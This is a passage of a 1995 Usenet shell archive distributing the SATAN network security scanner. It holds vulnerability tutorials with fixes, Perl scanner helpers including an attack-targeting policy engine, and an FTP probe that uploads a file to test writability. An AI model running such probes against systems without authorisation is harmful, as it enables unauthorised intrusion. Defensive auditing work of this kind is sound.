X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1><IMG SRC="../../images/satan.gif">WU-FTPD Vulnerability</H1>

X
X<HR>
X
X<H3>Summary</H3>
X

XRoot access via the wuarchive FTPD server.

X
X<H3>Impact</H3>
X

XUnauthorized remote root access to system.

X
X<H3>Background</H3>
X

XThe wuarchive FTPD daemon (or WU-FTPD) is a highly modified version
X(and significantly larger) version of FTPD that provides extra logging,
Xlimited remote command support, and other features to the standard
XBSD version of FTPD. The additional code adds greatly to the complexity,
Xand multiple significant software bugs have been found in it.

X
X<H3>The problem</H3>
X

XThere is a race condition in the code, as well as a bug in the
X<i>SITE EXEC</i> command, that allows anyone (remote or local) root
Xaccess on a host running a vulnerable FTPD daemon.
XSupport for anonymous FTP is not required to exploit this vulnerability.

X
X<H3>Fix</H3>
X
X<ul>
X

X<li> Don't use extended or modified FTPD daemons unless they are necessary -
Xvenders code is typically more stable and secure.
X
X<li> Upgrade to a more recent version of WU-FTPD; it can be found at the
X<a href="ftp://wuarchive.wustl.edu/packages/wuarchive-ftpd"> wuarchive ftp site</a>.
X
X<li> Restrict FTP access by using a tcp wrapper.
X
X</ul>
X
X<H3>See also</H3>
X
X<ul>
X<li> <a href="ftp://ftp.cert.org/pub/cert_advisories/CA-93:06.wuarchive.ftpd.vulnerability"> Cert Advisory 93:06</a>.
X
X<li> <a href="ftp://ftp.cert.org/pub/cert_advisories/CA-94:07.wuarchive.ftpd.trojan.horse"> Cert Advisory 94:07</a>.
X</ul>

X</BODY>
X</HTML>
END_OF_FILE

if test 1609 -ne `wc -c <'satan-1.1.1/html/tutorials/vulnerability/FTP_vulnerabilities.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/vulnerability/FTP_vulnerabilities.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/vulnerability/FTP_vulnerabilities.html'
fi
if test -f 'satan-1.1.1/html/tutorials/vulnerability/Sendmail_vulnerabilities.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/vulnerability/Sendmail_vulnerabilities.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/vulnerability/Sendmail_vulnerabilities.html'\" $1658 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/vulnerability/Sendmail_vulnerabilities.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<TITLE>Tutorial - Sendmail vulnerabilities</TITLE>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1><IMG SRC="../../images/satan.gif">Sendmail vulnerabilities</H1>

X
X<HR>
X
X<H3>Summary</H3>
X

XAssorted sendmail vulnerabilities.
X
X<H3>The problems</H3>
X
XNote: this text was adapted from <a
Xhref="ftp://ftp.cert.org/pub/cert_advisories/CA-95:05.sendmail.vulnerabilities">
XCert Advisory CA-95:05</a> of February 22, 1995.
X
X<p>
X
XWith almost every sendmail version that was built before February 1995,
Xa malicious user can gain unauthorized privileges by exploiting
Xnewlines in command-line arguments or in the process environment.
XIntruders need to have access to an account on your system to exploit
Xthis problem.
X
X<p>
X
XIn addition, pre-8.6.10 versions of sendmail that support IDENT (RFC
X1413) functionality have a problem that could allow an intruder to gain
Xunauthorized access to your system remotely (that is, without having
Xaccess to an account on the system).

X
X<H3>Fix</H3>
X
X<ul>
X

X<li>Replace sendmail by a more recent version, for example from <a
Xhref="ftp://ftp.cs.berkeley.edu/ucb/sendmail">
Xftp.cs.berkeley.edu:/ucb/sendmail</a>, or use a corrected version from
Xyour vendor.
X
X<li>Contact your vendor for information on how to get the latest
Xfixed/patched versions of sendmail.
X
X<li>Consult
X<a href="ftp://ftp.cert.org/pub/cert_advisories/CA-95:05.sendmail.vulnerabilities">
XCert Advisory CA-95:05</a> for more information.

X
X</ul>
X
X<H3>Other tips</H3>
X
X<ul>
X

X<li>See the
X<a href="../../docs/admin_guide_to_cracking.html#sendmail">Admin

XGuide to Cracking</a> for an example of why this is a problem.
X
X</ul>

X</BODY>
X</HTML>
END_OF_FILE

if test 1658 -ne `wc -c <'satan-1.1.1/html/tutorials/vulnerability/Sendmail_vulnerabilities.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/vulnerability/Sendmail_vulnerabilities.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/vulnerability/Sendmail_vulnerabilities.html'
fi
if test -f 'satan-1.1.1/html/tutorials/vulnerability/remote_shell_access.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/vulnerability/remote_shell_access.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/vulnerability/remote_shell_access.html'\" $1563 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/vulnerability/remote_shell_access.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<TITLE>Tutorial - remote shell access</TITLE>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1><IMG SRC="../../images/satan.gif">Remote shell access</H1>

X
X<HR>
X
X<H3>Summary</H3>
X

XRemote shell/remote login access from arbitrary hosts.

X
X<H3>Impact</H3>
X

XThe machine can be taken over by any malicious (super)user on the network.

X
X<H3>The problem</H3>
X

XWhen the remote login/remote shell service trusts every host on the
Xnetwork, a malicious superuser on an arbitrary host can gain access as
Xany user (except perhaps <em>root</em>). Once inside, the intruder
Xcan replace system programs or configuration files (such as the
Xpassword file) and take over the machine.
X
X<p>
XIn addition, there are guest or administrative accounts that might not
Xhave passwords protecting the account, which allows anyone to remotely
Xlogin as that user and gain access to the host.

X
X<H3>Fix</H3>
X

XRemove the wildcard (+) from the /etc/hosts.equiv file. Be careful with
Xthe use of the <tt>-@group</tt> netgroup feature, as there are many
Xincorrect implementations.
X
X<p>
X
XDelete or disable any accounts without a password from the system or
XNIS password file.

X
X<H3>Other tips</H3>
X
X<ul>
X

X<li> Give system accounts such as <em>bin</em> and <em> daemon</em> a
Xnon-functional shell (such as <em>/bin/false</em>) and put them in
Xthe <em>/etc/ftpusers</em> file so they cannot use ftp.

X
X<li>See the

X<a href="../../docs/admin_guide_to_cracking.html#remote-shell-access">Admin

XGuide to Cracking</a> for an example of why this is a problem.
X
X</ul>

X</BODY>
X</HTML>
END_OF_FILE

if test 1563 -ne `wc -c <'satan-1.1.1/html/tutorials/vulnerability/remote_shell_access.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/vulnerability/remote_shell_access.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/vulnerability/remote_shell_access.html'
fi
if test -f 'satan-1.1.1/html/tutorials/vulnerability/unrestricted_NFS_export.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/vulnerability/unrestricted_NFS_export.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/vulnerability/unrestricted_NFS_export.html'\" $1686 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/vulnerability/unrestricted_NFS_export.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<TITLE>Tutorial - Unrestricted NFS export</TITLE>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1><IMG SRC="../../images/satan.gif">Unrestricted NFS export</H1>

X
X<HR>
X
X<H3>Summary</H3>
X

XFile systems exported via NFS to arbitrary hosts.

X
X<H3>Impact</H3>
X

XUnauthorized remote access to system and/or user files.

X
X<H3>The problem</H3>
X

XWhen a file system is exported without restriction, an intruder can
Xremotely compromise user or system files, and then take over the
Xmachine. Examples:
X
X<ul>
X
X<li>An intruder can remotely replace a system program or configuration
Xfile.
X
X</ul>
X
XUNIX-specific examples:
X
X<ul>
X
X<li>An intruder can remotely install a <em> .rhosts</em> file to
Xobtain interactive access.
X
X<li>An intruder can remotely install a <em> .forward</em> file to
Xobtain non-interactive access.
X
X</ul>
X

X<H3>Fix</H3>
X
X<ul>
X

X<li>Make sure all file exports specify an explicit list of clients or
Xnetgroups.
X
X<li>Export file systems read-only where possible.
X

X</ul>
X
X<H3>Other tips</H3>
X
X<ul>
X

X<li>Some versions of the NFS mount daemon cannot expand large
Xnetgroups and will export to the world anyway; see also <a
Xhref="ftp://ftp.cert.org:/pub/cert_advisories/CA-94:02.REVISED.SunOS.rpc.mountd.vulnerability">
XCert advisory CA-94:02</a>. Check your vendor patch list.
X
X<li>In NIS netgroup members, empty host fields are treated as
Xwildcards and cause the mount daemon to grant access to any host.

X
X<li>Consider blocking ports 2049 (nfs) and 111 (portmap) on your
Xrouters.
X

X<li>See the
X<a href="../../docs/admin_guide_to_cracking.html#unrestricted-NFS-export">Admin

XGuide to Cracking</a> for an example of why this is a problem.
X
X</ul>

X</BODY>
X</HTML>
END_OF_FILE

if test 1686 -ne `wc -c <'satan-1.1.1/html/tutorials/vulnerability/unrestricted_NFS_export.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/vulnerability/unrestricted_NFS_export.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/vulnerability/unrestricted_NFS_export.html'
fi
if test -f 'satan-1.1.1/html/tutorials/vulnerability/unrestricted_X_server_access.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/vulnerability/unrestricted_X_server_access.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/vulnerability/unrestricted_X_server_access.html'\" $1967 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/vulnerability/unrestricted_X_server_access.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<TITLE>Tutorial - X server access</TITLE>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1><IMG SRC="../../images/satan.gif"> X server access</H1>

X
X<HR>
X
X<H3>Summary</H3>
X

XX server access from arbitrary hosts.

X
X<H3>Impact</H3>
X

XA remote intruder can control the keyboard, mouse and screen.

X
X<H3>Background</H3>
X

XThe X Window system implements an environment where applications use
Xthe network to interact with a user workstation's display, keyboard and
Xmouse. There are two classes of programs:
X
X<ul>
X
X<li>The X server: the program that manages the user's workstation
Xdisplay and input devices.
X
X<li>X clients: the applications that run on the user's workstation or
Xelsewhere in the network.

X
X</ul>
X
X<H3>The problem</H3>
X

XWhen the X server permits access from arbitrary hosts on the network, a
Xremote intruder can connect to the X server and:
X
X<ul>
X
X<li>Read the user's keyboard, including any passwords that the user
Xtypes,
X
X<li>Read everything that is sent to the screen,
X
X<li>Write arbitrary information to the screen,
X
X<li>Start or terminate arbitrary applications,
X
X<li>Take control of the user's session.
X
X</ul>
X
X<H3>Fix</H3>
X
XRemove all instances of the <em> xhost +</em> command from the
Xsystem-wide <em> Xsession</em> file, from user <em> .xsession</em>
Xfiles, and from any application programs or shell scripts that use the
XX window system.

X
X</ul>
X
X<H3>Other tips</H3>
X
X<ul>
X

X<li>Use the X magic cookie mechanism or equivalent. With logins under
Xcontrol of <em> xdm</em>, you turn on authentication by editing the
X<em> xdm-config</em> file and setting <em> the
XDisplayManager*authorize</em> attribute to <em> true</em>.
X
X<li>When granting access to the screen from another machine, use the
X<em> xauth</em> command in preference to the <em> xhost</em>
Xcommand.

X
X<li>See the

X<a href="../../docs/admin_guide_to_cracking.html#x-access">Admin

XGuide to Cracking</a> for an example of why this is a problem.
X
X</ul>

X</BODY>
X</HTML>
END_OF_FILE

if test 1967 -ne `wc -c <'satan-1.1.1/html/tutorials/vulnerability/unrestricted_X_server_access.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/vulnerability/unrestricted_X_server_access.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/vulnerability/unrestricted_X_server_access.html'
fi
if test -f 'satan-1.1.1/perl/fix_hostname.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/fix_hostname.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/fix_hostname.pl'\" $2001 characters$
sed "s/^X//" >'satan-1.1.1/perl/fix_hostname.pl' <<'END_OF_FILE'
X# fix possibly unqualified or truncated hostname, given the fqdn of the
X# host that we got the information from.
X#
X
Xsub fix_hostname {
X local ($host, $origin) = @_;
X local ($fqdn, $dot, $old, $frag, $n, $trial);
X
X # First see if the name (or IP address) is in the DNS.
X if ($host =~ /\./ && ($frag = &get_host_name(&get_host_addr($host)))) {
X $host = $frag;
X }
X
X # Can't do anything else for IP addresses.
X if ($host =~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) {
X return "";
X }
X
X # Can't do hostname completion when the originator is an IP address.
X if ($origin =~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) {
X return $host;
X }
X
X # Assume an unqualified name is in the same domain as the originator.
X #
X if (($dot = index($host, ".")) < $[) {
X return &get_host_name($host . substr($origin, index($origin, ".")));
X }
X $old = $dot;
X
X # Assume the hostname is trucated.
X foreach $trial ($origin, ".mil", ".edu", ".gov", ".net", ".org", ".com") {
X for ($dot = $old; length($frag = substr($host,$dot-$[)) > 1; $dot += $n) {
X # Match .fragment with (upper domain) of trial domain.
X if (($n = index($trial, $frag)) >= $[) {
X if ($fqdn = &get_host_name(substr($host, $[, $dot - $[) . substr($trial, $n))) {
X return $fqdn;
X }
X }
X # Strip lowest .subdomain from .fragment and retry.
X last if (($n = index(substr($frag, $[ + 1), ".") + 1 - $[) < 1);
X }
X }
X
X # Unable to fix the hostname.
X #
X return "";
X}
X
X#
X# Some scaffolding for stand-alone testing.
X#
Xif ($running_under_satan) {
X require 'perl/get_host.pl';

X} else {
X $running_under_satan = -1;
X

X require 'perllib/getopts.pl';
X require 'perl/get_host.pl';
X
X warn "fix_hostname.pl running in test mode";
X
X $usage = "usage: fix_hostname partial_name complete_name\n";
X &Getopts("v");
X
X if ($#ARGV != 1) {

X print STDERR $usage;
X exit 1;
X }
X

X print &fix_hostname($ARGV[0], $ARGV[1]),"\n";
X}
X
X1;
END_OF_FILE
if test 2001 -ne `wc -c <'satan-1.1.1/perl/fix_hostname.pl'`; then
echo shar: \"'satan-1.1.1/perl/fix_hostname.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/fix_hostname.pl'
fi
if test -f 'satan-1.1.1/perl/policy-engine.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/policy-engine.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/policy-engine.pl'\" $1967 characters$
sed "s/^X//" >'satan-1.1.1/perl/policy-engine.pl' <<'END_OF_FILE'
X#
X# version 1, Tue Mar 21 20:21:33 1995, last mod by wietse
X#
Xsub policy_engine

X{
Xlocal($target, $proximity) = @_;
X

X#
X# Respect the maximal proximity level.
X#
Xif ($proximity > $max_proximity_level) {
X print "policy: pruning $target via proximity level\n" if $debug;
X return -1;
X}
X
X#
X# Do not attack "verboten" hosts.
X#
Xif (&target_is_exception($target)) {
X print "policy: pruning $target via exception\n" if $debug;
X return -1;
X}
X
X#
X# attacks tend to get weaker the farther away from home; do they
X# wither and die, or keep going at a low level?
X#
X$new_attack_level = $attack_level - ($proximity * $proximity_descent);
Xif ($new_attack_level < 0) {
X if (!$sub_zero_proximity) {
X print "policy: pruning $target via attack level < 0\n";
X return -1;
X }
X else {
X $new_attack_level = 0;
X }
X }
X
Xprint "policy: $target prox $proximity level $new_attack_level\n" if $debug;
X
Xreturn $new_attack_level;
X
X}
X
X#
X# Does target match list of shell-like patterns?
X#
Xsub match_host {
X local($target, $patterns) = @_;
X local($pattern);
X
X for $pattern (split(/(,|\s)+/, $patterns)) {
X $pattern =~ s/\.$//; # strip trailing dot
X $pattern =~ s/^\.//; # strip leading dot
X $pattern =~ s/\./\\./g; # quote dots
X $pattern =~ s/\*/.*/g; # translate regexp star to shell star
X if ($pattern =~ /^\d+/) {
X return 1 if ($all_hosts{$target}{'IP'} =~ /^$pattern\b/);
X } else {
X return 1 if ($target =~ /\b$pattern$/);
X }
X }
X return 0;
X}
X
X#
X# don't want to attack certain sites, like .mil, etc.
X#
Xsub target_is_exception
X{
X local($target) = @_;
X local($pattern);
X
X #
X # if this is set, only attack things that contain this string:
X if ($only_attack_these && !&match_host($target, $only_attack_these)) {
X return 1;
X }
X #
X # if this is set, don't attack things that contain this string:
X if ($dont_attack_these && &match_host($target, $dont_attack_these)) {
X return 1;
X }
X #
X # else, nothing is wrong, go for it...
X return 0;
X}
X
X1;
END_OF_FILE
if test 1967 -ne `wc -c <'satan-1.1.1/perl/policy-engine.pl'`; then
echo shar: \"'satan-1.1.1/perl/policy-engine.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/policy-engine.pl'
fi
if test -f 'satan-1.1.1/perl/subnets.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/subnets.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/subnets.pl'\" $2183 characters$
sed "s/^X//" >'satan-1.1.1/perl/subnets.pl' <<'END_OF_FILE'
X#
X# sift by subnets

X#
X# Output to:
X#

X# $all_subnets{subnet}: hosts per subnet
X#
X# $host_subnet{host}: subnet of this host
X#
X# $subnet_count{subnet}: number of hosts in this subnet
X#
X# $subnet_severities{subnet}: nr of vulnerable hosts in subnet
X#
X# $subnet_flag: reset whenever the tables are updated. To recalculate,
X# invoke make_subnet_info().
X#
X# Standalone usage: perl subnets.pl [data directory]
X#
X
X#
X# Generate subnet statistics.
X#
Xsub make_subnet_info {
Xlocal($subnet, $host);
X
Xif ($subnet_flag > 0) {
X return;
X }
X$subnet_flag = time();
X%all_subnets = ();
X
X&make_severity_info();
X
Xprint "Rebuild subnet type statistics...\n" if $debug;
X
X%all_subnets = ();
X%host_subnet = ();
X
Xfor $host (keys %all_hosts) {
X if ($host) {
X ($subnet = $all_hosts{$host}{'IP'}) =~ s/\.[^.]*$//;
X $subnet = "unknown" unless $subnet;
X $all_subnets{$subnet} .= "$host ";
X $host_subnet{$host} = $subnet;
X }
X }
X
X# Cheat in case the facts file has names not in all-hosts.
X
Xfor $host (keys %hosttype, keys %severity_host_count) {
X next unless $host;
X next if defined($host_subnet{$host});
X if ($host =~ /^([0-9]+\.[0-9]+\.[0-9]+)\.[0-9]+$/) {
X $subnet = $1;
X } else {
X $subnet = "unknown";
X }
X $all_subnets{$subnet} .= "$host ";
X $host_subnet{$host} = $subnet;
X}
X
Xfor $subnet (keys %all_subnets) {
X $subnet_count{$subnet} = split(/\s+/, $all_subnets{$subnet});
X $subnet_severities{$subnet} = 0;
X for $host (split(/\s+/, $all_subnets{$subnet})) {
X $subnet_severities{$subnet}++ if exists($severity_host_type_info{$host});

X }
X }
X}
X
X#

X# erase the subnet info tables
X#
Xsub clear_subnet_info {
X %all_subnets = ();
X %host_subnet = ();
X %subnet_count = ();
X %subnet_severities = ();
X $subnet_flag = 0;

X}
X
X#
X# Stand-alone mode
X#
Xif ($running_under_satan == 0) {

Xwarn "subnets.p in stand-alone mode...";
X$running_under_satan = 1;
X$debug = 1;
Xrequire 'perl/targets.pl';
Xrequire 'perl/severities.pl';
Xrequire 'perl/facts.pl';
X
X&read_all_hosts("$ARGV[0]/all-hosts");
X&read_facts("$ARGV[0]/facts");
X&make_subnet_info();
X
Xprint "Subnet info\n";
X
Xfor (keys %all_subnets) {
X print "Subnet: $_ $subnet_severities{$_}/$subnet_count{$_}\n";
X for (split(/\s/, $all_subnets{$_})) {

X print "\t$_\n";
X }
X }
X}
X
X1;
END_OF_FILE

if test 2183 -ne `wc -c <'satan-1.1.1/perl/subnets.pl'`; then
echo shar: \"'satan-1.1.1/perl/subnets.pl'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/perl/subnets.pl'
# end of 'satan-1.1.1/perl/subnets.pl'
fi
if test -f 'satan-1.1.1/src/fping/README' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/fping/README'\"
else
echo shar: Extracting \"'satan-1.1.1/src/fping/README'\" $2334 characters$
sed "s/^X//" >'satan-1.1.1/src/fping/README' <<'END_OF_FILE'
X
X fping - A tool to quickly ping N number of hosts to determine
X their reachability without flooding the network.
X
X Roland J. Schemers III - Stanford University
X sche...@Slapshot.Stanford.EDU
X
X fping is a ping(1) like program which uses the Internet Control
X Message Protocol (ICMP) echo request to determine if a host is
X up. fping is different from ping in that you can specify any
X number of hosts on the command line, or specify a file containing
X the lists of hosts to ping. Instead of trying one host until it
X timeouts or replies, fping will send out a ping packet and move
X on to the next host in a round-robin fashion. If a host replies,
X it is noted and removed from the list of hosts to check. If a host
X does not respond within a certain time limit and/or retry limit it

X will be considered unreachable.
X

XSite
X Stanford University has a large TCP/IP network with over 12,000
X assigned IP addresses and over 100 IP subnets.
X
XProblem and Issues
X
X With a large a number of IP addresses in use, its becomes more and
X more time consuming to check on which IP addresses are actively
X in use, and which critical machines (routers, bridges, servers, etc)
X are reachable. One example is we have a program which goes through
X all of our routers arp caches looking for IP addresses that are in
X use. After finding a list of IP addresses that aren't in any arp
X caches fping can then be used to see if these IP addresses really
X aren't being used, or are just behind the routers. Checking 2500
X hosts (99% of which are unreachable) via ping can take hours.
X
XSolution
X
X fping was written to solve the problem of pinging N number of hosts
X in an efficient manner. By sending out pings in a round-robin fashion
X and checking on responses as they come in at random, a large number of
X hosts can be checked at once. Checking 2500 hosts (5 packets per host,
X 10 msec between ping packets) takes under 3 minutes. Also, using fping
X to check 30 routers that are currently reachable takes about 420
X milliseconds (elapsed real time).
X
X Unlike ping, fping is meant to be used in scripts and its
X output is easy to parse.
END_OF_FILE
if test 2334 -ne `wc -c <'satan-1.1.1/src/fping/README'`; then
echo shar: \"'satan-1.1.1/src/fping/README'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/fping/README'
fi
if test -f 'satan-1.1.1/src/rpcgen/rpc_scan.h' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/rpcgen/rpc_scan.h'\"
else
echo shar: Extracting \"'satan-1.1.1/src/rpcgen/rpc_scan.h'\" $2259 characters$
sed "s/^X//" >'satan-1.1.1/src/rpcgen/rpc_scan.h' <<'END_OF_FILE'
X/* @(#)rpc_scan.h 2.1 88/08/01 4.0 RPCSRC */

X/* @(#)rpc_scan.h 1.3 87/03/09 (C) 1987 SMI */
X
X/*
X * rpc_scan.h, Definitions for the RPCL scanner

X * Copyright (C) 1987, Sun Microsystems, Inc.
X */
X

X/*
X * kinds of tokens
X */
Xenum tok_kind {
X TOK_IDENT,
X TOK_STRCONST,
X TOK_LPAREN,
X TOK_RPAREN,
X TOK_LBRACE,
X TOK_RBRACE,
X TOK_LBRACKET,
X TOK_RBRACKET,
X TOK_LANGLE,
X TOK_RANGLE,
X TOK_STAR,
X TOK_COMMA,
X TOK_EQUAL,
X TOK_COLON,
X TOK_SEMICOLON,
X TOK_CONST,
X TOK_STRUCT,
X TOK_UNION,
X TOK_SWITCH,
X TOK_CASE,
X TOK_DEFAULT,
X TOK_ENUM,
X TOK_TYPEDEF,
X TOK_INT,
X TOK_SHORT,
X TOK_LONG,
X TOK_UNSIGNED,
X TOK_FLOAT,
X TOK_DOUBLE,
X TOK_OPAQUE,
X TOK_CHAR,
X TOK_STRING,
X TOK_BOOL,
X TOK_VOID,
X TOK_PROGRAM,
X TOK_VERSION,
X TOK_EOF
X};
Xtypedef enum tok_kind tok_kind;
X
X/*
X * a token
X */
Xstruct token {
X tok_kind kind;
X char *str;
X};
Xtypedef struct token token;
X
X
X/*
X * routine interface
X */
Xvoid scanprint();
Xvoid scan();
Xvoid scan2();
Xvoid scan3();
Xvoid scan_num();
Xvoid peek();
Xint peekscan();
Xvoid get_token();
END_OF_FILE
if test 2259 -ne `wc -c <'satan-1.1.1/src/rpcgen/rpc_scan.h'`; then
echo shar: \"'satan-1.1.1/src/rpcgen/rpc_scan.h'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/rpcgen/rpc_scan.h'
fi
echo shar: End of archive 12 $of 15$.
cp /dev/null ark12isdone

Wietse Venema

unread,

Apr 13, 1995, 3:00:00 AM4/13/95

Submitted-by: wswi...@wsbs06.win.tue.nl (Wietse Venema)
Posting-number: Volume 47, Issue 137
Archive-name: satan/part13

Environment: UNIX && HTML && Perl 5.0

#! /bin/sh

# This is a shell archive. Remove anything before this line, then feed it
# into a shell via "sh file" or similar. To overwrite existing files,
# type "sh file -c".

# Contents: satan-1.1.1/bin/faux_fping satan-1.1.1/bin/ftp.satan
# satan-1.1.1/bin/get_targets satan-1.1.1/bin/nfs-chk.satan
# satan-1.1.1/bin/rsh.satan satan-1.1.1/bin/rusers.satan
# satan-1.1.1/html/data/satan_data_form.pl
# satan-1.1.1/html/data/satan_merge_action.pl
# satan-1.1.1/html/data/satan_open_action.pl
# satan-1.1.1/html/docs/authors.html
# satan-1.1.1/html/docs/copyright.html
# satan-1.1.1/html/reporting/satan_info_clients.pl
# satan-1.1.1/html/reporting/satan_info_servers.pl
# satan-1.1.1/html/reporting/satan_info_subnet.pl
# satan-1.1.1/html/reporting/satan_results_trusted.pl
# satan-1.1.1/html/reporting/satan_results_trusting.pl
# satan-1.1.1/html/reporting/satan_severity_hosts.pl
# satan-1.1.1/html/satan.pl
# satan-1.1.1/html/tutorials/vulnerability/REXD_access.html
# satan-1.1.1/html/tutorials/vulnerability/TFTP_file_access.html
# satan-1.1.1/html/tutorials/vulnerability/unrestricted_modem.html
# satan-1.1.1/html/tutorials/vulnerability/writable_FTP_home_directory.html
# satan-1.1.1/perl/drop_fact.pl satan-1.1.1/perl/get_host.pl
# satan-1.1.1/perl/infer_facts.pl satan-1.1.1/perl/misc.pl
# satan-1.1.1/perllib/ctime.pl satan-1.1.1/rules/facts
# satan-1.1.1/rules/services
# Wrapped by kent@ftp on Wed Apr 12 20:30:10 1995

PATH=/bin:/usr/bin:/usr/ucb:/usr/local/bin:/usr/lbin:$PATH ; export PATH
echo If this archive is complete, you will see the following message:

echo ' "shar: End of archive 13 (of 15)."'
if test -f 'satan-1.1.1/bin/faux_fping' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/faux_fping'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/faux_fping'\" $243 characters$
sed "s/^X//" >'satan-1.1.1/bin/faux_fping' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X#
X# fping replacement that skips unresolvable hosts.

X#
X
X$running_under_satan = 1;

Xrequire 'perl/get_host.pl';
Xrequire 'config/paths.pl';
X
X$timeout = 5;
X
Xfor (@ARGV) { system("$PING $_ $timeout") if &get_host_name($_); }
END_OF_FILE
if test 243 -ne `wc -c <'satan-1.1.1/bin/faux_fping'`; then
echo shar: \"'satan-1.1.1/bin/faux_fping'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/faux_fping'
# end of 'satan-1.1.1/bin/faux_fping'
fi
if test -f 'satan-1.1.1/bin/ftp.satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/ftp.satan'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/ftp.satan'\" $1390 characters$
sed "s/^X//" >'satan-1.1.1/bin/ftp.satan' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X
X# See if the target provides anonymous ftp, non-intrusive.
X
Xrequire 'config/paths.pl';
Xrequire 'config/satan.cf';

Xrequire 'perl/misc.pl';
Xrequire 'perllib/getopts.pl';
X

X$usage="Usage: $0 [-v] target";
X&Getopts("v") || die $usage;
X($#ARGV == 0) || die $usage;

X
X$target = $ARGV[0];
X

X$service = &basename($0, ".satan");
X

Xopen(FTP, "$FTP -nv <<EOF
Xopen $target
Xquote user anonymous
Xquote pass -satan\@
Xcd /
Xput /etc/group $$.foo
Xdele $$.foo
Xquit
XEOF |") || die "cannot run $FTP";
Xwhile(<FTP>) {
X if (defined($opt_v)) {
X print;
X }
X if (/^230/) {
X $status = "a";
X $severity = "x";
X $trustee = "";
X $trusted = "";
X $service_output = "ANONYMOUS";
X $text = "offers anon ftp";
X $texts{&satan_string()} = 1;
X } elsif (/^226/) {
X $severity = "nw";
X $trustee = "~ftp@$target";
X $trusted = "ANY\@ANY";
X $service_output = "writable FTP home directory";
X $text = "~ftp is writable";
X $texts{&satan_string()} = 1;
X } elsif (/^553/) {
X $severity = "";
X $trustee = "";
X $trusted = "";
X $service_output = "";
X $text = "~ftp is not writable";
X $texts{&satan_string()} = 1;
X } elsif (/^530/) {
X $status = "a";
X $severity = "";
X $trustee = "";
X $trusted = "";
X $service_output = "";
X $text = "offers no anon ftp";
X $texts{&satan_string()} = 1;
X } elsif (/^Not connected/) {

X exit 1;
X }
X}
X

Xforeach $key (keys %texts) {
X print "$key\n";
X}
END_OF_FILE
if test 1390 -ne `wc -c <'satan-1.1.1/bin/ftp.satan'`; then
echo shar: \"'satan-1.1.1/bin/ftp.satan'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/ftp.satan'
# end of 'satan-1.1.1/bin/ftp.satan'
fi
if test -f 'satan-1.1.1/bin/get_targets' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/get_targets'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/get_targets'\" $1613 characters$
sed "s/^X//" >'satan-1.1.1/bin/get_targets' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X#
X# Scan a subnet for live hosts
X#
X# If given IP address or hostname, scan everything on that subnet.
X# If given partial IP address (e.g. 140.174.97), do the same.
X#
X# Method used:
X#
X# Use fping to scan the net; any hits send to gethostbyaddr to
X# get the hostname. This will print out a list of hostname and/or
